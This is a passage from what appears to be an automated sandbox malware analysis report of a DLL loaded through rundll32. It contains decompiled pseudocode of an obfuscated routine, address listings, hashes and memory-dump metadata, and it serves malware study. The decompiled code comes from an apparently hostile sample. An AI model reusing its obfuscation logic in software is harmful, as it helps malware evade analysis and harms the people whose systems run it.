										_v28 = _t513;
										_v12 = _t513 + 2 + _t669;
										_t516 =  *0x6e2c5a00; // 0xf1bb93cc
										_v24 = _t516;
									}
									_t461 = ( *0x6e2c59f2 & 0x0000ffff) + ( *0x6e2c59e6 & 0x0000ffff);
									_t759 = _v28;
									_v56 = _t461;
									__eflags = _t461 - 0x32;
									if(_t461 != 0x32) {
										_t761 = _t759 * _t906 * 0x10e1d;
										_t669 = _t761 * 0x37;
										__eflags = _t669;
										_t888 = _t669;
									} else {
										_t461 = _v56;
										_t761 = _t759 - _t906 * _t906 * 0x10e1d + _t888;
									}
									__eflags = _v40 - 0x10;
									_v28 = _t761;
									if(_v40 >= 0x10) {
										L129:
										_t915 = _v8;
										goto L130;
									} else {
										__eflags = _t461 - 0x32;
										if(_t461 != 0x32) {
											_t500 = _t761 * _v20 * 0x00000e1d & 0x0000ffff;
											_t915 = _t500;
											_v20 = _t500;
											_v8 = _t500;
											_t669 = (_t915 & 0x0000ffff) * 0x37;
											__eflags = _t669;
											_t888 = _t669;
										} else {
											_t798 = _t761 - _v20 * _v20 * 0x00000e1d + _t888 & 0x0000ffff;
											_v20 = _t798;
											_t915 = _t798;
											_v8 = _t798;
										}
										_t793 = _v40 - 1;
										_t502 = 6;
										_v40 = _t793;
										__eflags =  *0x6e2c5a02 - _t502; // 0xf1bb
										if(__eflags == 0) {
											_t505 = (_t915 & 0x0000ffff) + 0x11dde + _t793;
											_v24 = _t505;
											 *0x6e2c5a00 = _t505;
											L130:
											_t462 = 6;
											__eflags =  *0x6e2c5a02 - _t462; // 0xf1bb
											if(__eflags == 0) {
												_t465 = (_t863 & 0x000000ff) + 0x11dde + (_t915 & 0x0000ffff);
												__eflags = _t465;
											} else {
												_v8 = _t915 +  ~(_t863 & 0x000000ff) - _v12 * 0x3d;
												_v20 = _v8;
												_t465 = _v12;
											}
											__eflags = _t888 - _t465;
											if(_t888 >= _t465) {
												_t494 = _v28;
												_t669 = _t888 - _t465 * 0x3d - _t494;
												 *0x6e2c59f2 =  *0x6e2c59f2 - _t494;
												__eflags =  *0x6e2c59f2;
												_t888 = _t669;
											}
											_t906 = _v36 + _v24 + 2;
											 *0x6e2c5a90 = _t906;
											_v16 = _t906;
											E6E1FF5C7();
											__eflags =  *0x6e2c59f2 - _v8; // 0xcdeb
											_t858 = _t906;
											_t765 =  <=  ? _t906 & 0x0000ffff :  *0x6e2c59e0 & 0x0000ffff;
											_t470 =  *0x6e2c5a00; // 0xf1bb93cc
											_v36 = _v36 - 1;
											 *0x6e2c59e0 =  <=  ? _t906 & 0x0000ffff :  *0x6e2c59e0 & 0x0000ffff;
											_t766 = _v60;
											_v24 = _t470;
											_v56 = _t470 + _t766;
											__eflags = _t766 - 2;
											if(_t766 >= 2) {
												_t740 =  *0x6e2c5a04; // -76
												_t472 = _t740 & 0x000000ff;
												_v16 = _t740;
												__eflags = _t888 - _t472;
												if(_t888 < _t472) {
													goto L144;
												}
												_t477 = _v40;
												 *0x6e2c59f2 =  *0x6e2c59f2 - _t477;
												_t669 = _t888 - _t472 * 0x3d - _t477;
												_t479 = _t477 - _t740 + _t669;
												__eflags = _t479;
												_t740 = _t479;
												 *0x6e2c5a04 = _t740;
												goto L143;
											} else {
												__eflags = ( *0x6e2c59e6 & 0x0000ffff) + ( *0x6e2c59f2 & 0x0000ffff) - 0x32;
												if(( *0x6e2c59e6 & 0x0000ffff) + ( *0x6e2c59f2 & 0x0000ffff) != 0x32) {
													_t785 = _t858 * _v20 * 0x00000e1d & 0x0000ffff;
													_v8 = _t785;
													_t669 = (_t785 & 0x0000ffff) * 0x37;
													__eflags = _t669;
												} else {
													_t785 = _t858 - _v20 * _v20 * 0x00000e1d + _t888 & 0x0000ffff;
												}
												_t486 = _v60 - 1;
												_v60 = _t486;
												_t740 =  *0x6e2c5a04; // -76
												_v20 = _t486 * _t785 * 0x00000e1d & 0x0000ffff;
												L143:
												_v16 = _t740;
												L144:
												_v12 = (_v56 + 5) * 0x654ae;
												continue;
											}
										} else {
											_t508 = _v20 +  ~_t793 - _v24 * 0x3d;
											__eflags = _t508;
											_v20 = _t508;
											_v8 = _t508;
											goto L129;
										}
									}
								}
							}
						}
						_t908 = _t672 + 0x11dde + _t858;
						_t674 = _t672 - _v68 - 0x54;
						_v64 = _t674;
						__eflags = ( *0x6e2c59e6 & 0x0000ffff) + (_t886 & 0x0000ffff) - 0x32;
						_t743 = _v16;
						_t431 = _t743 & 0x000000ff;
						if(( *0x6e2c59e6 & 0x0000ffff) + (_t886 & 0x0000ffff) != 0x32) {
							_t675 = ((_t674 & 0x000000ff) * _t431 & 0x000000ff) * 0x1d;
							_t858 = (_t675 & 0x000000ff) * 0x37;
							__eflags = _t858;
							_t434 = _v64;
							 *0x6e2c5a90 = _t858;
						} else {
							_t434 = _v64;
							_t675 = _t858 - ((_t743 & 0x000000ff) * _t431 & 0x000000ff) * 0x1d + _t434;
						}
						 *0x6e2c5a04 = _t675;
						_v8 = _t434 + _v68 + _v8 + 0x3b;
						_t437 = 6;
						__eflags =  *0x6e2c5a02 - _t437; // 0xf1bb
						if(__eflags == 0) {
							_t440 = _t858 - 0x22 + _v8;
							__eflags = _t440;
							 *0x6e2c5a04 = _t440;
						} else {
							_t858 = _t858 - (_t675 & 0x000000ff) * 0x3d - (_v8 & 0x0000ffff);
							 *0x6e2c5a90 = _t858;
						}
						 *0x6e2c59d0 = _t908 - _t858 - 0x54;
						_t441 = E6E1FF218(_t908 - _t858 - 0x54);
						_t748 =  *0x6e2c59d0; // 0xf9ac1f88
						_t910 = _t748 + 0x0000248e & 0x0000ffff;
						__eflags = ( *0x6e2c59e6 & 0x0000ffff) + ( *0x6e2c59f2 & 0x0000ffff) - 0x32;
						if(( *0x6e2c59e6 & 0x0000ffff) + ( *0x6e2c59f2 & 0x0000ffff) != 0x32) {
							_t912 = _t910 * _t441 * 0x10e1d;
							__eflags = _t912;
						} else {
							_t912 = _t910 - _t441 * _t441 * 0x10e1d + 0x6b0;
						}
						 *0x6e2c5a90 = _t912;
						return  *0x6e2c5a04 & 0x000000ff;
					}
				}
			}

























































































































































































                          0x6e1ffb4d
                          0x6e1ffb52
                          0x6e1ffb59
                          0x6e1ffb6b
                          0x6e1ffb76
                          0x6e1ffb7d
                          0x6e1ffb8f
                          0x6e1ffb93
                          0x6e1ffb98
                          0x6e1ffb9d
                          0x6e1ffba3
                          0x6e1ffbaa
                          0x6e1ffbb0
                          0x6e1ffbb7
                          0x6e1ffbc0
                          0x6e1ffbc4
                          0x6e1ffbc6
                          0x6e1ffbca
                          0x6e1ffbcc
                          0x00000000
                          0x00000000
                          0x6e1ffbd1
                          0x6e1ffbd4
                          0x6e1ffbde
                          0x6e1ffbe0
                          0x6e1ffbe8
                          0x00000000
                          0x00000000
                          0x6e1ffbea
                          0x6e1ffbea
                          0x6e1ffbed
                          0x6e1ffc03
                          0x6e1ffc09
                          0x6e1ffc0d
                          0x6e1ffc17
                          0x6e1ffc1e
                          0x6e1ffc20
                          0x6e1ffc25
                          0x6e1ffc2f
                          0x6e1ffc34
                          0x6e1ffc38
                          0x6e1ffc42
                          0x6e1ffc42
                          0x6e1ffc49
                          0x6e1ffc4e
                          0x6e1ffc5c
                          0x6e1ffc69
                          0x6e1ffc77
                          0x6e1ffc7e
                          0x6e1ffc9f
                          0x6e1ffca5
                          0x6e1ffca5
                          0x6e1ffc80
                          0x6e1ffc80
                          0x6e1ffc92
                          0x6e1ffc92
                          0x6e1ffca8
                          0x6e1ffcb0
                          0x6e1ffcb5
                          0x6e1ffcbb
                          0x6e1ffcc2
                          0x6e1ffcc6
                          0x6e1ffccd
                          0x6e1ffcd0
                          0x6e1ffcd4
                          0x6e1ffce0
                          0x6e1ffce7
                          0x6e1ffceb
                          0x6e1ffcf5
                          0x6e1ffcf5
                          0x6e1ffcfd
                          0x6e1ffd01
                          0x6e1ffd15
                          0x6e1ffd1a
                          0x6e1ffd1f
                          0x6e1ffd26
                          0x6e1ffd2a
                          0x6e1ffd33
                          0x6e1ffd37
                          0x6e1ffd39
                          0x00000000
                          0x00000000
                          0x6e1ffd3e
                          0x6e1ffd41
                          0x6e1ffd4b
                          0x6e1ffd4f
                          0x00000000
                          0x00000000
                          0x6e1ffd51
                          0x6e1ffd51
                          0x6e1ffd54
                          0x6e1ffd61
                          0x6e1ffd67
                          0x6e1ffd6b
                          0x6e1ffd75
                          0x6e1ffd78
                          0x6e1ffd79
                          0x6e1ffd80
                          0x6e1ffd9d
                          0x6e1ffda3
                          0x6e1ffda3
                          0x6e1ffda5
                          0x6e1ffda9
                          0x6e1ffd82
                          0x6e1ffd82
                          0x6e1ffd8d
                          0x6e1ffd95
                          0x6e1ffd95
                          0x6e1ffdb1
                          0x6e1ffdbf
                          0x6e1ffdc2
                          0x6e1ffdc6
                          0x6e1ffdcd
                          0x6e1ffdd1
                          0x6e1ffdd6
                          0x6e1ffdde
                          0x6e1ffde6
                          0x6e1ffdeb
                          0x6e1ffdee
                          0x6e1ffdf6
                          0x6e1ffdf8
                          0x6e1ffe09
                          0x6e1ffe0b
                          0x6e1ffe0f
                          0x6e1ffe17
                          0x6e1ffe1c
                          0x6e1ffe23
                          0x6e1ffe23
                          0x6e1ffe25
                          0x6e1ffe2b
                          0x6e1ffe33
                          0x6e1ffe35
                          0x6e1ffe3a
                          0x6e1ffe3f
                          0x6e1ffe48
                          0x6e1ffe4a
                          0x6e1ffe4d
                          0x6e1ffe50
                          0x6e1ffe52
                          0x6e1ffe57
                          0x6e1ffe57
                          0x6e1ffe59
                          0x6e1ffe5c
                          0x6e1ffe64
                          0x6e1ffe69
                          0x6e1ffe70
                          0x6e1ffe79
                          0x6e1ffe81
                          0x6e1ffe8c
                          0x6e1ffe8c
                          0x6e1ffe90
                          0x6e1ffe9d
                          0x6e1ffe9f
                          0x6e1ffea6
                          0x6e1ffec2
                          0x6e1ffec8
                          0x6e1ffec8
                          0x6e1ffea8
                          0x6e1ffeb5
                          0x6e1ffeb9
                          0x6e1ffeb9
                          0x6e1ffed2
                          0x6e1ffedd
                          0x6e1ffee1
                          0x6e1ffee4
                          0x6e1fff0a
                          0x6e1fff13
                          0x6e1fff13
                          0x6e1fff16
                          0x6e1ffee6
                          0x6e1ffeff
                          0x6e1fff03
                          0x6e1fff03
                          0x6e1fff1a
                          0x6e1fff1d
                          0x6e1fff24
                          0x6e1fff28
                          0x6e1fff2a
                          0x00000000
                          0x00000000
                          0x6e1fff33
                          0x6e1fff39
                          0x6e1fff3c
                          0x6e1fff40
                          0x00000000
                          0x00000000
                          0x6e1fff42
                          0x6e1fff46
                          0x6e1fff46
                          0x6e1fff4b
                          0x6e1fff5a
                          0x6e1fff5e
                          0x6e1fff87
                          0x6e1fff87
                          0x6e1fff60
                          0x6e1fff79
                          0x6e1fff79
                          0x6e1fff8d
                          0x6e1fff91
                          0x6e1fff9a
                          0x6e1fffa0
                          0x6e1fffa4
                          0x6e1fffa7
                          0x6e1fffb5
                          0x6e1fffdd
                          0x6e1fffe6
                          0x6e1fffe6
                          0x6e1fffb7
                          0x6e1fffd1
                          0x6e1fffd1
                          0x6e1ffff0
                          0x6e1ffffb
                          0x6e1ffffd
                          0x6e200004
                          0x6e200006
                          0x6e200014
                          0x6e200014
                          0x6e20001d
                          0x6e200026
                          0x6e200035
                          0x6e200044
                          0x6e20004f
                          0x6e200053
                          0x6e200057
                          0x6e200058
                          0x6e20005f
                          0x6e200063
                          0x6e200071
                          0x6e200074
                          0x6e200078
                          0x6e20007a
                          0x6e20007a
                          0x6e200063
                          0x6e200085
                          0x6e200091
                          0x6e200095
                          0x6e200095
                          0x6e20009b
                          0x6e20009e
                          0x6e2000a9
                          0x6e2000b0
                          0x6e2000b4
                          0x6e2000b7
                          0x6e2000bd
                          0x6e200102
                          0x6e200106
                          0x6e20010d
                          0x6e20010f
                          0x6e200113
                          0x6e200117
                          0x6e20011b
                          0x6e200121
                          0x6e200123
                          0x6e200127
                          0x6e200129
                          0x6e20012d
                          0x6e200133
                          0x6e20013a
                          0x6e20013a
                          0x6e20013d
                          0x6e20013d
                          0x6e200141
                          0x6e2000bf
                          0x6e2000cb
                          0x6e2000cd
                          0x6e2000d8
                          0x6e2000db
                          0x6e2000e7
                          0x6e2000eb
                          0x6e2000ed
                          0x6e2000f1
                          0x6e2000f3
                          0x6e2000f7
                          0x6e2000f7
                          0x6e20014a
                          0x00000000
                          0x00000000
                          0x6e20015f
                          0x6e200165
                          0x6e200169
                          0x6e20016e
                          0x6e200173
                          0x6e200178
                          0x6e20017c
                          0x6e200183
                          0x6e200187
                          0x6e20018c
                          0x6e20018e
                          0x6e200192
                          0x6e200198
                          0x6e2001a1
                          0x6e2001ab
                          0x6e2001ab
                          0x6e2001b3
                          0x6e2001b7
                          0x6e2001bd
                          0x6e2001ca
                          0x6e2001dc
                          0x6e2001de
                          0x6e2001e4
                          0x6e2001ed
                          0x6e2001f0
                          0x6e2001f4
                          0x6e2001f4
                          0x6e2001fd
                          0x6e200201
                          0x6e200208
                          0x6e20020a
                          0x6e20022e
                          0x6e200232
                          0x6e20020c
                          0x6e200212
                          0x6e20021e
                          0x6e200223
                          0x6e20022a
                          0x6e20022a
                          0x6e200236
                          0x6e20023a
                          0x6e20023e
                          0x6e200247
                          0x6e20024b
                          0x6e20024f
                          0x6e200251
                          0x6e200290
                          0x6e200253
                          0x6e200258
                          0x6e20025a
                          0x6e20025d
                          0x6e200261
                          0x6e200263
                          0x6e20026a
                          0x6e20026e
                          0x6e200275
                          0x6e20027e
                          0x6e200280
                          0x6e200284
                          0x6e200286
                          0x6e20028a
                          0x6e20028a
                          0x6e200275
                          0x6e200296
                          0x6e200297
                          0x6e20029e
                          0x6e2002a0
                          0x6e2002b5
                          0x6e2002bf
                          0x6e2002bf
                          0x6e2002c1
                          0x6e2002a2
                          0x6e2002a9
                          0x6e2002ab
                          0x6e2002b1
                          0x6e2002b1
                          0x6e2002cc
                          0x6e2002d3
                          0x6e2002d7
                          0x6e2002dd
                          0x6e200308
                          0x00000000
                          0x6e2002df
                          0x6e2002df
                          0x6e2002e6
                          0x00000000
                          0x00000000
                          0x6e2002e8
                          0x6e2002ed
                          0x6e2002f1
                          0x6e2002ff
                          0x6e200302
                          0x6e20030c
                          0x6e20030c
                          0x6e200310
                          0x6e200319
                          0x6e200322
                          0x6e200324
                          0x6e200326
                          0x6e20032b
                          0x6e200337
                          0x6e200337
                          0x6e200339
                          0x6e20033f
                          0x6e20033f
                          0x6e200343
                          0x6e200344
                          0x6e20034a
                          0x6e200363
                          0x6e200363
                          0x00000000
                          0x6e20034c
                          0x6e20034c
                          0x6e200353
                          0x00000000
                          0x00000000
                          0x6e20035b
                          0x6e20035d
                          0x6e200367
                          0x6e200376
                          0x6e20037c
                          0x6e20037c
                          0x6e20037e
                          0x6e200382
                          0x6e200388
                          0x6e200388
                          0x6e200393
                          0x6e200397
                          0x6e20039c
                          0x6e20039d
                          0x6e2003a1
                          0x6e2003a8
                          0x6e2003cc
                          0x6e2003d9
                          0x6e2003d9
                          0x6e2003aa
                          0x6e2003b8
                          0x6e2003bc
                          0x6e2003c0
                          0x6e2003c0
                          0x6e2003df
                          0x6e2003e3
                          0x6e2003e9
                          0x6e2003f8
                          0x6e2003fc
                          0x6e2003fd
                          0x6e200404
                          0x6e200431
                          0x6e200431
                          0x6e200406
                          0x6e200414
                          0x6e200418
                          0x6e20041c
                          0x6e20041c
                          0x6e200404
                          0x6e200433
                          0x6e200438
                          0x6e20043f
                          0x6e200455
                          0x6e200457
                          0x6e20045a
                          0x6e20045e
                          0x6e200461
                          0x6e200488
                          0x6e20048e
                          0x6e20048e
                          0x6e200491
                          0x6e200463
                          0x6e200475
                          0x6e200475
                          0x6e200497
                          0x6e2004a2
                          0x6e2004a8
                          0x6e2004ab
                          0x6e2004b7
                          0x6e2004b7
                          0x6e2004b7
                          0x6e2004be
                          0x6e2004c5
                          0x6e2004d0
                          0x6e2004db
                          0x6e2004de
                          0x6e2004fb
                          0x6e2004fb
                          0x6e2004e0
                          0x6e2004ef
                          0x6e2004ef
                          0x6e200501
                          0x6e200506
                          0x6e20050a
                          0x6e200513
                          0x6e200516
                          0x00000000
                          0x00000000
                          0x6e200525
                          0x6e200527
                          0x6e200529
                          0x6e200536
                          0x6e20053d
                          0x6e20053d
                          0x6e20053f
                          0x6e200541
                          0x6e200545
                          0x6e200545
                          0x6e20054b
                          0x6e20054f
                          0x6e200552
                          0x6e200558
                          0x6e20055c
                          0x6e200560
                          0x6e200560
                          0x6e200565
                          0x6e200565
                          0x6e200576
                          0x6e200578
                          0x6e200579
                          0x6e20057f
                          0x6e200586
                          0x6e2005ae
                          0x6e2005b8
                          0x6e2005b8
                          0x6e2005ba
                          0x6e200588
                          0x6e20059a
                          0x6e20059c
                          0x6e2005a0
                          0x6e2005a4
                          0x6e2005a4
                          0x6e2005c5
                          0x6e2005c7
                          0x6e2005ce
                          0x6e2005d0
                          0x6e2005d0
                          0x6e2005d7
                          0x6e2005db
                          0x6e2005de
                          0x6e2005e4
                          0x6e2005e4
                          0x6e2005f2
                          0x6e2005f8
                          0x6e200601
                          0x6e200604
                          0x6e200608
                          0x6e20060c
                          0x6e200610
                          0x6e2006c1
                          0x6e2006c1
                          0x00000000
                          0x6e200616
                          0x6e20061f
                          0x6e200621
                          0x6e200623
                          0x6e200629
                          0x6e20062d
                          0x6e200631
                          0x6e200636
                          0x6e20063c
                          0x6e200643
                          0x6e20064a
                          0x6e200657
                          0x6e200659
                          0x6e200659
                          0x6e20065c
                          0x6e200660
                          0x6e200663
                          0x6e200663
                          0x6e200669
                          0x6e200672
                          0x6e200680
                          0x6e200680
                          0x6e200682
                          0x6e200686
                          0x6e20068c
                          0x6e20068c
                          0x6e200690
                          0x6e200691
                          0x6e200693
                          0x6e20069a
                          0x6e2006b7
                          0x6e2006b7
                          0x6e2006b9
                          0x6e2006bf
                          0x00000000
                          0x6e20069c
                          0x6e2006a9
                          0x6e2006ab
                          0x6e2006c5
                          0x6e2006c5
                          0x6e2006cd
                          0x6e200724
                          0x6e20072b
                          0x6e2006cf
                          0x6e2006cf
                          0x6e2006d1
                          0x6e2006da
                          0x6e2006da
                          0x6e2006e1
                          0x6e2006e1
                          0x6e2006e9
                          0x6e2006ef
                          0x6e2006f4
                          0x6e2006fa
                          0x6e2006fc
                          0x6e200702
                          0x6e200708
                          0x6e200711
                          0x6e200715
                          0x6e20071a
                          0x6e20071a
                          0x6e20073d
                          0x6e20073f
                          0x6e200743
                          0x6e200747
                          0x6e20074a
                          0x6e200762
                          0x6e200768
                          0x6e200768
                          0x6e20076b
                          0x6e20074c
                          0x6e200757
                          0x6e20075b
                          0x6e20075b
                          0x6e20076d
                          0x6e200772
                          0x6e200776
                          0x6e2007ed
                          0x6e2007ed
                          0x00000000
                          0x6e200778
                          0x6e200778
                          0x6e20077b
                          0x6e2007ab
                          0x6e2007ae
                          0x6e2007b1
                          0x6e2007b5
                          0x6e2007bc
                          0x6e2007bc
                          0x6e2007bf
                          0x6e20077d
                          0x6e20078e
                          0x6e200791
                          0x6e200795
                          0x6e200798
                          0x6e200798
                          0x6e2007c7
                          0x6e2007c8
                          0x6e2007c9
                          0x6e2007cd
                          0x6e2007d4
                          0x6e20082a
                          0x6e20082c
                          0x6e200830
                          0x6e2007f2
                          0x6e2007f4
                          0x6e2007f5
                          0x6e2007fc
                          0x6e200842
                          0x6e200842
                          0x6e2007fe
                          0x6e20080f
                          0x6e200818
                          0x6e20081c
                          0x6e20081c
                          0x6e200844
                          0x6e200846
                          0x6e20084f
                          0x6e200853
                          0x6e200855
                          0x6e200855
                          0x6e20085c
                          0x6e20085c
                          0x6e200869
                          0x6e20086d
                          0x6e200873
                          0x6e200877
                          0x6e20088d
                          0x6e200894
                          0x6e200896
                          0x6e200899
                          0x6e20089e
                          0x6e2008a2
                          0x6e2008a9
                          0x6e2008ad
                          0x6e2008b3
                          0x6e2008b7
                          0x6e2008ba
                          0x6e200924
                          0x6e20092a
                          0x6e20092d
                          0x6e200931
                          0x6e200933
                          0x00000000
                          0x00000000
                          0x6e20093c
                          0x6e200940
                          0x6e200947
                          0x6e20094b
                          0x6e20094b
                          0x6e20094d
                          0x6e20094f
                          0x00000000
                          0x6e2008bc
                          0x6e2008cc
                          0x6e2008cf
                          0x6e2008f6
                          0x6e2008fc
                          0x6e200900
                          0x6e200900
                          0x6e2008d1
                          0x6e2008e4
                          0x6e2008e4
                          0x6e200907
                          0x6e200908
                          0x6e20090f
                          0x6e20091e
                          0x6e200955
                          0x6e200955
                          0x6e200959
                          0x6e200966
                          0x00000000
                          0x6e200966
                          0x6e2007d6
                          0x6e2007e3
                          0x6e2007e3
                          0x6e2007e5
                          0x6e2007e9
                          0x00000000
                          0x6e2007e9
                          0x6e2007d4
                          0x6e200776
                          0x6e20069a
                          0x6e200610
                          0x6e200980
                          0x6e200985
                          0x6e20098a
                          0x6e20098e
                          0x6e200991
                          0x6e200995
                          0x6e200998
                          0x6e2009bb
                          0x6e2009c1
                          0x6e2009c1
                          0x6e2009c4
                          0x6e2009c8
                          0x6e20099a
                          0x6e2009aa
                          0x6e2009ae
                          0x6e2009ae
                          0x6e2009db
                          0x6e2009e3
                          0x6e2009e7
                          0x6e2009e8
                          0x6e2009ef
                          0x6e200a0c
                          0x6e200a0c
                          0x6e200a10
                          0x6e2009f1
                          0x6e2009fe
                          0x6e200a00
                          0x6e200a00
                          0x6e200a1a
                          0x6e200a20
                          0x6e200a25
                          0x6e200a38
                          0x6e200a44
                          0x6e200a47
                          0x6e200a5f
                          0x6e200a5f
                          0x6e200a49
                          0x6e200a54
                          0x6e200a54
                          0x6e200a6d
                          0x6e200a78
                          0x6e200a78
                          0x6e20034a

                          APIs
                          • Sleep.KERNELBASE(00000071), ref: 6E2006E9
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.483288618.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000003.00000002.483284816.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483332321.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483367165.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483373942.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483378050.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Sleep
                          • String ID: 2$DZ,n$DZ,n$DZ,n$E$L$T$Y,n
                          • API String ID: 3472027048-2801240159
                          • Opcode ID: ab14fc04ed549c28c4de31b0a532c140bed70b84bc4f9a8c0d94e6447a089954
                          • Instruction ID: 4a0a675bf42e61a391a0ac0831cee13419d77d656197b3721e979498ae3cb2c2
                          • Opcode Fuzzy Hash: ab14fc04ed549c28c4de31b0a532c140bed70b84bc4f9a8c0d94e6447a089954
                          • Instruction Fuzzy Hash: CD92DE716483528FCB48CF6AC59956ABBF2BBDA600F40192EF0C5CB391E375C845CB62
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E2078D3, Relevance: 3.0, APIs: 2, Instructions: 24COMMON
                          Download Yara Rule

                          Control-flow Graph

                          C-Code - Quality: 66%
                          			E6E2078D3(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t11;
				intOrPtr* _t19;
				intOrPtr _t21;
				void* _t22;

				E6E2200AC(0x6e268421, __ebx, __edi, __esi, 0);
				_t19 = __ecx;
				_push(8);
				 *__ecx = 0x6e26aa30;
				_t21 = E6E21F8B6(__edx, __esi, __eflags);
				if(_t21 == 0) {
					_t21 = 0;
					__eflags = 0;
				} else {
					 *(_t22 - 4) =  *(_t22 - 4) & 0x00000000;
					_push(1); // executed
					_t11 = E6E207005(__ebx, _t19, _t21); // executed
					 *((intOrPtr*)(_t21 + 4)) = _t11;
				}
				 *((intOrPtr*)(_t19 + 0x34)) = _t21;
				E6E207F47(_t19);
				return E6E220075(_t19);
			}







                          0x6e2078da
                          0x6e2078df
                          0x6e2078e1
                          0x6e2078e3
                          0x6e2078ee
                          0x6e2078f3
                          0x6e207906
                          0x6e207906
                          0x6e2078f5
                          0x6e2078f5
                          0x6e2078f9
                          0x6e2078fb
                          0x6e207901
                          0x6e207901
                          0x6e20790a
                          0x6e20790d
                          0x6e207919

                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E2078DA
                          • std::locale::_Init.LIBCPMT ref: 6E2078FB
                            • Part of subcall function 6E207005: __EH_prolog3.LIBCMT ref: 6E20700C
                            • Part of subcall function 6E207005: std::_Lockit::_Lockit.LIBCPMT ref: 6E207017
                            • Part of subcall function 6E207005: std::locale::_Setgloballocale.LIBCPMT ref: 6E207032
                            • Part of subcall function 6E207005: _Yarn.LIBCPMT ref: 6E207048
                            • Part of subcall function 6E207005: std::_Lockit::~_Lockit.LIBCPMT ref: 6E207088
                          Memory Dump Source
                          • Source File: 00000003.00000002.483288618.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000003.00000002.483284816.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483332321.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483367165.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483373942.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483378050.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: H_prolog3Lockitstd::_std::locale::_$InitLockit::_Lockit::~_SetgloballocaleYarn
                          • String ID:
                          • API String ID: 3152668004-0
                          • Opcode ID: 0ca6e57f01e111cddd69ffcb867a043a36f1cfd2428931c055d9b457b5bc4098
                          • Instruction ID: 75a7b05ee0c68bce66fa10d362e75f8cb1b0a555dd5c666b178b86233fd882a4
                          • Opcode Fuzzy Hash: 0ca6e57f01e111cddd69ffcb867a043a36f1cfd2428931c055d9b457b5bc4098
                          • Instruction Fuzzy Hash: 77E0267AA2162E5FE31167E48511FDDE2977F80B18F62051AD2009F2C0DFF45E0047C1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E24C7EF, Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 330 6e24c7ef-6e24c7fa 331 6e24c7fc-6e24c806 330->331 332 6e24c808-6e24c80e 330->332 331->332 333 6e24c83c-6e24c847 call 6e242281 331->333 334 6e24c827-6e24c838 RtlAllocateHeap 332->334 335 6e24c810-6e24c811 332->335 339 6e24c849-6e24c84b 333->339 336 6e24c813-6e24c81a call 6e25beb2 334->336 337 6e24c83a 334->337 335->334 336->333 343 6e24c81c-6e24c825 call 6e249256 336->343 337->339 343->333 343->334
                          C-Code - Quality: 95%
                          			E6E24C7EF(void* __ecx, signed int _a4, signed int _a8) {
				void* _t8;
				void* _t12;
				signed int _t13;
				void* _t15;
				void* _t16;
				signed int _t17;
				void* _t19;
				signed int _t20;
				long _t21;

				_t16 = __ecx;
				_t20 = _a4;
				if(_t20 == 0) {
					L2:
					_t21 = _t20 * _a8;
					if(_t21 == 0) {
						_t21 = _t21 + 1;
					}
					while(1) {
						_t8 = RtlAllocateHeap( *0x6e2c7b04, 8, _t21); // executed
						if(_t8 != 0) {
							break;
						}
						__eflags = E6E25BEB2();
						if(__eflags == 0) {
							L8:
							 *((intOrPtr*)(E6E242281())) = 0xc;
							__eflags = 0;
							return 0;
						}
						_t12 = E6E249256(_t15, _t16, _t17, _t19, __eflags, _t21);
						_pop(_t16);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L8;
						}
					}
					return _t8;
				}
				_t13 = 0xffffffe0;
				_t17 = _t13 % _t20;
				if(_t13 / _t20 < _a8) {
					goto L8;
				}
				goto L2;
			}












                          0x6e24c7ef
                          0x6e24c7f5
                          0x6e24c7fa
                          0x6e24c808
                          0x6e24c808
                          0x6e24c80e
                          0x6e24c810
                          0x6e24c810
                          0x6e24c827
                          0x6e24c830
                          0x6e24c838
                          0x00000000
                          0x00000000
                          0x6e24c818
                          0x6e24c81a
                          0x6e24c83c
                          0x6e24c841
                          0x6e24c847
                          0x00000000
                          0x6e24c847
                          0x6e24c81d
                          0x6e24c822
                          0x6e24c823
                          0x6e24c825
                          0x00000000
                          0x00000000
                          0x6e24c825
                          0x00000000
                          0x6e24c827
                          0x6e24c800
                          0x6e24c801
                          0x6e24c806
                          0x00000000
                          0x00000000
                          0x00000000

                          APIs
                          • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,6E24D6B4,00000001,00000364,?,6E220F8B,00000002,00000000,?,?,?,6E1E1298,6E2075D9), ref: 6E24C830
                          Memory Dump Source
                          • Source File: 00000003.00000002.483288618.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000003.00000002.483284816.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483332321.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483367165.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483373942.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483378050.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
